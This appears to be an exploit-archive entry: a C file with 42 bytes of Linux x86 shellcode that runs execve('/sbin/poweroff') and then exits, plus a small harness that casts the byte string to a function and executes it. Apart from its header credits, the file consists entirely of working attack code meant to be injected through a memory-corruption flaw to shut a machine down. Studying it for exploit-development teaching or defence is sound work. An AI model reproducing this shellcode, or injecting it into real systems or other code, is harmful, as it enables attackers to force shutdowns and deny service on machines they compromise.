/* +========================================================================================================= | # Exploit Title : linux/x86 execve("/sbin/poweroff") + exit(0) - 42 bytes | # Exploit Author : Febriyanto Nugroho | # Tested on : Linux Debian 5.0.5 | -------------------------------------------------------------------------------------------------------- | # Thank's to : xevil, CyberKaze, X-Cisadane, Deyubi-Cyber, Deflectoz, justinisal, Bomber88, | ame, d0ey_Grunch, bh0ttu, Revil, and all Bogor Hackers Community member and crew ... +========================================================================================================= */ #include <stdio.h> #include <string.h> char *shellcode = "\x31\xc0\x50\x68\x72\x6f\x66" "\x66\x68\x70\x6f\x77\x65\x68" "\x6e\x2f\x2f\x2f\x68\x2f\x73" "\x62\x69\x89\xe3\x50\x53\x89" "\xe1\xb0\x0b\xcd\x80\x31\xc0" "\x50\x89\xe3\xb0\x01\xcd\x80"; int main(int argc, char *argv[]) { printf("shellcode length -> %d bytes\n", (int)strlen(shellcode)); int (*ret)()=(int(*)())shellcode; ret(); return 0; }